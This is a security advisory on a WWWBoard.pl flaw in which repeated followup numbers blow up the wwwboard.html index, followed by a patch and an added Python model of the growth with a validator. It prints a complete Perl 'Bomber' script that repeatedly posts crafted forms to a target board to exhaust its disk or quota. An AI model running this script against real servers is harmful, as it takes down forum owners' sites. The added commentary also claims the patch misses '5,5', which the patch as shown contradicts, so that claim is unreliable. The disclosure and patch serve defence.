COMMAND
WWWBoard
SYSTEMS AFFECTED
Systems running WWWBoard.pl
PROBLEM
Samuel Sparling found the following. When the followup value in a
form posted to the WWWBoard script contains the same post number
twice, the script follows up to that post twice, and even prints the
number of followups to that post (in the wwwboard.html file)
multiple times. This does more than just 'mess up' the board: done
severely enough, it can make the wwwboard.html file hundreds of
megabytes in size. The number of followups shown on the main page
(three followups appear as "(3)") grows exponentially with the number
of posts. Posting a followup value of, say, "5,5,5" two times makes
"(2)" the followup count, but that count then appears 9 times. As far
as can be told, the number of repeated followup numbers in one post
(e.g. "3,3,3,3,3" has 5) is the number of times the followup count
will appear on the wwwboard.html page; posting the same value twice
raises that number to the second power, three times to the third
power, and so on. So if you post "3,3,3,3,3" once the page shows 5
followup counts, twice 25, three times 125, ten times 9,765,625,
twelve times 244,140,625, thirteen times 1,220,703,125, etc. And
although it looks as if only three bytes "(X)" are added for each
followup count you see, the HTML source carries a comment as well:
"(<!--responses: 3-->5)" for 5 followups to message 3, which is 22
bytes per copy rather than three.
As those numbers show, this can do far more damage than cause a
simple annoyance. The flaw can easily be driven to the point where a
user's quota is exhausted, or even where the web server runs out of
disk space. Below is an exploit script, followed by a patch for the
wwwboard.pl script. Here is an example Perl script to exploit this
flaw:
#!/usr/bin/perl
###################################################
#
# WWWBoard Bomber Exploit Script
# Written By: Samuel Sparling (sparling@slip.net)
#
# Written to exploit a flaw in the WWWBoard script
# by Matt Wright.
#
# Copyright © 1998 Samuel Sparling
# All Rights Reserved.
#
# Written 11-04-1998
###################################################
use strict;
use Socket;   # socket(), inet_aton(), sockaddr_in(), PF_INET, SOCK_STREAM

# Change this if the server you're trying on uses a different port for http
my $port = 80;

print "WWWBoard Bomber Exploit Script\n\n";

# Prompt for one value and drop the trailing newline
sub ask {
    my ($prompt) = @_;
    print "$prompt: ";
    my $v = <STDIN>;
    chomp($v);
    return $v;
}

my $url      = ask("WWWBoard.pl URL");
my $name     = ask("Name");
my $email    = ask("E-Mail");
my $subject  = ask("Subject");
my $message  = ask("Message");
my $followup = ask("Followup Value");   # e.g. 3,3,3,3,3 (the repeats are the bomb)
my $stop     = ask("Times to Post");

# Chop the URL into pieces to use for the actual posting:
# host is everything between http:// and the first /, path is the rest
my $remote = $url;
$remote =~ s{^http://}{};
$remote =~ s{/.*$}{}s;
my $path = $url;
$path =~ s{^http://}{};
$path =~ s/^\Q$remote\E//;
$path = "/" if $path eq "";

# Percent-encode anything that is not safe in a form value, so the
# commas in the followup field (%2C) and other special characters survive
sub urlencode {
    my ($s) = @_;
    $s =~ s/([^A-Za-z0-9_.~-])/sprintf("%%%02X", ord($1))/ge;
    $s =~ s/%20/+/g;
    return $s;
}

my $forminfo = join("&",
    "name="     . urlencode($name),
    "email="    . urlencode($email),
    "followup=" . urlencode($followup),
    "subject="  . urlencode($subject),
    "body="     . urlencode($message));
my $length = length($forminfo);

# One HTTP/1.0 POST; every header on its own CRLF-terminated line
my $submit = "POST $path HTTP/1.0\r\n"
           . "Host: $remote\r\n"
           . "Referer: $url\r\n"
           . "User-Agent: Mozilla/4.01 (Win95; I)\r\n"
           . "Content-Type: application/x-www-form-urlencoded\r\n"
           . "Content-Length: $length\r\n"
           . "\r\n"
           . $forminfo;

my $i = 0;
while ($i < $stop) {
    post_message();
    $i++;
    print "$i message(s) posted.\n";
}
exit;

# Open a TCP connection to the server, send the POST and drain the reply
sub post_message {
    if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
    die("No port specified.") unless $port;
    my $iaddr = inet_aton($remote) || die("Failed to find host: $remote");
    my $paddr = sockaddr_in($port, $iaddr);
    my $proto = getprotobyname('tcp');
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
    connect(SOCK, $paddr) || die("Unable to connect: $!");
    send(SOCK, $submit, 0);
    while (<SOCK>) {
        # print $_;   # Uncomment for debugging if you have problems.
    }
    close(SOCK);
}
SOLUTION
Below is the patch. All it does is check that the same followup
number is not used more than once in the followup form field, and
call WWWBoard's own error routine if it is. The check has to run over
the full list from the form field (@followup_num), because
get_variables pops the last message number off @followups before
anything else happens, so a check on @followups alone would miss a
value such as "5,5". In the get_variables subroutine replace this:
if ($FORM{'followup'}) {
    $followup = "1";
    @followup_num = split(/,/,$FORM{'followup'});
    $num_followups = @followups = @followup_num;
    $last_message = pop(@followups);
    $origdate = "$FORM{'origdate'}";
    $origname = "$FORM{'origname'}";
    $origsubject = "$FORM{'origsubject'}";
}
with this:
if ($FORM{'followup'}) {
    $followup = "1";
    @followup_num = split(/,/,$FORM{'followup'});
    $num_followups = @followups = @followup_num;
    $last_message = pop(@followups);
    $origdate = "$FORM{'origdate'}";
    $origname = "$FORM{'origname'}";
    $origsubject = "$FORM{'origsubject'}";
    # WWWBoard Bomb Patch
    # Written By: Samuel Sparling (sparling@slip.net)
    # Reject the post if any message number appears more than once in
    # the followup field. Walk @followup_num (the full list), not
    # @followups, which has already had the last message popped off.
    # Each entry must be a plain number; keying the hash on the numeric
    # value makes "03" and "3" count as the same message.
    my %seen_fup;
    foreach $fm (@followup_num) {
        &error('board_bomb') unless $fm =~ /^\d+$/;
        &error('board_bomb') if $seen_fup{$fm + 0}++;
    }
    # End WWWBoard Bomb Patch
}
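The following Python is an added example, not code from WWWBoard or from the advisory. It serves two passages: the arithmetic under PROBLEM (k repeated followup numbers posted n times leave k^n copies of the count on the page) and the duplicate check under SOLUTION. The index rewrite is an assumed model of how wwwboard.pl might process the followup list (for each index line with a responses marker, loop over the followup numbers and emit the line once per match); it is used because it reproduces the growth the advisory reports, not because the page confirms that is the script's exact logic. The sample index, the `max_followups` cap and the function names are constructed for the example.

```python
"""Model of the WWWBoard followup amplification plus a hardened check.

Added example, not WWWBoard's or the advisory's code.  The rewrite below
is an assumed model of the script's behaviour, chosen because it yields
the k**n growth the advisory describes.
"""

import re

RESP_RE = re.compile(r"<!--responses: (\d+)-->(\d+)")

# Constructed sample wwwboard.html index: two messages, no followups yet.
SAMPLE_INDEX = [
    "<ul>",
    '<li><a href="messages/3.html">Hello</a> - <b>alice</b> (<!--responses: 3-->0)',
    '<li><a href="messages/5.html">Re: Hello</a> - <b>bob</b> (<!--responses: 5-->0)',
    "</ul>",
]


def rewrite_index(lines, followups):
    """One follow-up post against the index under the assumed model.

    A line whose responses marker matches a number in `followups` is
    written out once per matching entry with the count bumped, so
    duplicates in the field multiply the line instead of bumping it once.
    """
    out = []
    for line in lines:
        m = RESP_RE.search(line)
        if not m:
            out.append(line)
            continue
        msg_num, count = m.group(1), int(m.group(2))
        hits = [f for f in followups if f == msg_num]
        if not hits:
            out.append(line)
            continue
        bumped = RESP_RE.sub(f"<!--responses: {msg_num}-->{count + 1}", line, count=1)
        out.extend([bumped] * len(hits))
    return out


def bomb(lines, followup_field, times):
    """Post the same unchecked followup field `times` times."""
    for _ in range(times):
        lines = rewrite_index(lines, followup_field.split(","))
    return lines


def marker_lines(lines, msg_num):
    """How many index lines carry the responses marker for msg_num."""
    tag = f"<!--responses: {msg_num}-->"
    return sum(1 for line in lines if tag in line)


def check_followup_field(value, max_followups=32):
    """Hardened form of the advisory's check, run over the whole field.

    Returns the message numbers as ints.  Rejects duplicates (the bomb),
    non-numeric entries, and lists longer than max_followups (an assumed
    cap, not something WWWBoard has).  Scanning the full list matters:
    the advisory's patch scans @followups after the last number has been
    popped off, so a value like "5,5" slips past it.
    """
    if value == "":
        return []
    parts = value.split(",")
    if len(parts) > max_followups:
        raise ValueError("board_bomb: too many followups")
    seen = set()
    nums = []
    for part in parts:
        if not re.fullmatch(r"\d+", part):
            raise ValueError(f"board_bomb: bad followup number {part!r}")
        n = int(part)          # "03" and "3" name the same message
        if n in seen:
            raise ValueError(f"board_bomb: duplicate followup {n}")
        seen.add(n)
        nums.append(n)
    return nums


def safe_post(lines, followup_field):
    """Apply one post only if the field passes the check."""
    nums = check_followup_field(followup_field)
    return rewrite_index(lines, [str(n) for n in nums])


if __name__ == "__main__":
    after = bomb(SAMPLE_INDEX, "5,5,5", 2)
    print(marker_lines(after, "5"), "copies of the count for message 5")
    for k, n in ((5, 1), (5, 2), (5, 3), (5, 10), (5, 13)):
        print(f"{k} repeats posted {n} times -> {k ** n:,} copies")
```

Running the script shows "5,5,5" posted twice leaving 9 copies of "(2)" for message 5, matching the advisory, and the size table for "3,3,3,3,3" follows directly from `k ** n`. The check is the part worth carrying over: validate the field as a list of distinct message numbers before anything touches wwwboard.html.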